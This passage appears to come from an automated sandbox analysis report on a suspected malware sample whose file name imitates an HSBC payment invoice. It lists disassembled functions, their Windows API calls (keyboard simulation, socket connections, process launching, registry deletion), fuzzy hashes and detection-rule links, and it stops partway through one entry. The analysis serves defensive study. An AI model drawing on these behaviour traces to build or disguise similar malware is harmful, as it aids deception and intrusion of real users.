                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                    • Instruction ID: 81b50d76c846a32c2cf5b91f6a027fe182bf2ef528d567b4096d38dd7bd19f40
                    • Opcode Fuzzy Hash: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                    • Instruction Fuzzy Hash: 4F21F871601216B7D250A5609C42FEF37ACDF553E8F282012FE05F6382EB11ED22D2E6
                    Function 00EED7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CoInitialize.OLE32(00000000), ref: 00EED855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EED8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00EED8FC
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EED9B7
                    • _memset.LIBCMT ref: 00EEDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00EEDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EEDAAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                    • String ID:
                    • API String ID: 3008154123-0
                    • Opcode ID: bd74baacef09eaa7cbef3b661d856dff18397522fa4cbc4f7a86bce9195f770e
                    • Instruction ID: bb59482c625d256dbd6176b0892d904fa22a7b33c876e28e8c243272b83b2042
                    • Opcode Fuzzy Hash: bd74baacef09eaa7cbef3b661d856dff18397522fa4cbc4f7a86bce9195f770e
                    • Instruction Fuzzy Hash: 66B1E975A00109AFDB14DFA5CC88DAEBBF9FF48314B149469E909EB251DB30EE45CB50
                    Function 00E81424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                    • Instruction ID: 33ce8d94d4751ac8bf51125fdd9593531322c87935ce3965f7278cce5c1281a1
                    • Opcode Fuzzy Hash: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                    • Instruction Fuzzy Hash: 56717E30900119EFCB14DF98CC49AFEBBB9FF85314F148199F919BA251C730AA52DBA0
                    Function 00F0B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(011B3B98), ref: 00F0B6A5
                    • IsWindowEnabled.USER32(011B3B98), ref: 00F0B6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F0B795
                    • SendMessageW.USER32(011B3B98,000000B0,?,?), ref: 00F0B7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00F0B809
                    • GetWindowLongW.USER32(011B3B98,000000EC), ref: 00F0B82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F0B843
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                    • Instruction ID: e32a6c6c38577452bc7e223a773e0c84e8bf13a519aabd9ed1e55063ff362aa5
                    • Opcode Fuzzy Hash: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                    • Instruction Fuzzy Hash: 34719F34A00204AFDB30DF64C8A4FAA7BB9FF4A320F1440A9E955973E1C732A941FB51
                    Function 00EF86D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CoInitialize.OLE32 ref: 00EF8718
                    • VariantInit.OLEAUT32(?), ref: 00EF8890
                    • VariantClear.OLEAUT32(?), ref: 00EF88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 4106155388-1287834457
                    • Opcode ID: 3d2a73d80caecd6ec04eb6799ebc2dd0a4dc342d8dc36736f2e524bd022dce4b
                    • Instruction ID: 18a478ec11c630515662bffe60ae04166ed01c36d1812186755fad2571f6542f
                    • Opcode Fuzzy Hash: 3d2a73d80caecd6ec04eb6799ebc2dd0a4dc342d8dc36736f2e524bd022dce4b
                    • Instruction Fuzzy Hash: DE61D3316083059FC714EF24CA44BABB7E4EF48754F54581EFA85AB291DB70ED48CB92
                    Function 00EFF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EFF75C
                    • _memset.LIBCMT ref: 00EFF825
                    • ShellExecuteExW.SHELL32(?), ref: 00EFF86A
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00EFF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00EFF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: fe3b08a086c5202d74d1e51c1b74cf4533c2a21d5b40a6ecfd7c2dcd25b1629b
                    • Instruction ID: 9f2ac01190b3635b8ce4baf1eee8ae308b2f91bf6a5420d10442931cd724e406
                    • Opcode Fuzzy Hash: fe3b08a086c5202d74d1e51c1b74cf4533c2a21d5b40a6ecfd7c2dcd25b1629b
                    • Instruction Fuzzy Hash: 97618B75E006199FCF18EFA4C4819AEBBF5FF48314B149469E95ABB351CB30AD41CB90
                    Function 00EE145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 00EE149C
                    • GetKeyboardState.USER32(?), ref: 00EE14B1
                    • SetKeyboardState.USER32(?), ref: 00EE1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                    • Instruction ID: c5f39be1baadc59dcc25796d1f0a2cf8bd561dd4c8cdfec94f1ff80ad4523612
                    • Opcode Fuzzy Hash: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                    • Instruction Fuzzy Hash: D951D2B06046DA3EFB3646268C45BBABEA96B46308F0C55C9E1D6658C2D3A49CC8D750
                    Function 00EE1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 00EE12B5
                    • GetKeyboardState.USER32(?), ref: 00EE12CA
                    • SetKeyboardState.USER32(?), ref: 00EE132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                    • Instruction ID: 8d13c3107d430de1d2a61648f9ed36c5654dfc6c3a21ef07e8a47de4bf99fdb6
                    • Opcode Fuzzy Hash: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                    • Instruction Fuzzy Hash: 3851E4B05046D93DFB3282268C45BBA7FA96B06308F0895C9E1D466CC2D3A5ACD8E751
                    Function 00EE589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                    • Instruction ID: 34ab70ef647425f51b921aace18306a5bb4a6d5192dc59b04da59992e6993a41
                    • Opcode Fuzzy Hash: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                    • Instruction Fuzzy Hash: 4D41C4A6C2011876CB11EBB58C86ACFB7E89F0A310F50A866F518F7122E734E754C7A5
                    Function 00EE38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00EE38F3
                    • _wcscmp.LIBCMT ref: 00EE390F
                    • MoveFileW.KERNEL32(?,?), ref: 00EE3927
                    • _wcscat.LIBCMT ref: 00EE396F
                    • SHFileOperationW.SHELL32(?), ref: 00EE39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                    • Instruction ID: a720bb4dcd62a706b5427ce149fecd8b697d631557dbe80e0ff3265442625142
                    • Opcode Fuzzy Hash: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                    • Instruction Fuzzy Hash: A441B1B25083889EC751EF75C4859DFB7E8AF89340F10282EF489E3192EB75D688C752
                    Function 00F07500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00F07519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F075C0
                    • IsMenu.USER32(?), ref: 00F075D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F07620
                    • DrawMenuBar.USER32 ref: 00F07633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                    • Instruction ID: 77e1d664c5cef2e8ed62cd326f3c32f2f8cc80902f5fdcb70325fc4faf54d0f5
                    • Opcode Fuzzy Hash: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                    • Instruction Fuzzy Hash: 12412875E04708AFDB20EF54D984AAABBF8FB09324F048069E91697290D731AD54EF90
                    Function 00F0122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F0125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F01286
                    • FreeLibrary.KERNEL32(00000000), ref: 00F0133D
                      • Part of subcall function 00F0122D: RegCloseKey.ADVAPI32(?), ref: 00F012A3
                      • Part of subcall function 00F0122D: FreeLibrary.KERNEL32(?), ref: 00F012F5
                      • Part of subcall function 00F0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F01318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F012E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                    • Instruction ID: 45aa357b83a715d6d32cd9c322dc28e749abb1d90b2cdcd538e55fcfe9beff40
                    • Opcode Fuzzy Hash: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                    • Instruction Fuzzy Hash: 84310BB1D0111DBFEB159B90DC89AFFB7BCFF09310F000169E501E2591EA749E89BAA0
                    Function 00F0653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F0655B
                    • GetWindowLongW.USER32(011B3B98,000000F0), ref: 00F0658E
                    • GetWindowLongW.USER32(011B3B98,000000F0), ref: 00F065C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F065F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F0661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F06630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F0664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                    • Instruction ID: 291ee436dfbb1d92ffbd39a1f82f5b0090b278853eeef6574321c86a7ad94a66
                    • Opcode Fuzzy Hash: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                    • Instruction Fuzzy Hash: 7231F235A04258AFDB208F18DC85F653BE1FB5A724F1901A8F911CB2F5CB62A864FB51
                    Function 00EF6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF64D9
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF64E8
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00EF652A
                    • WSAGetLastError.WS2_32 ref: 00EF6534
                    • closesocket.WS2_32(00000000), ref: 00EF655D
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                    • Instruction ID: 27f54d17a1f65878590c8c7fcd2d7f763567ea4958696c7a0fd94471e4c1741f
                    • Opcode Fuzzy Hash: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                    • Instruction Fuzzy Hash: CC31937160011CAFDB10AF64DC85BBE7BE9FB44714F049069FA09B7291DB74AD08DBA1
                    Function 00F0783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F078A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F078AE
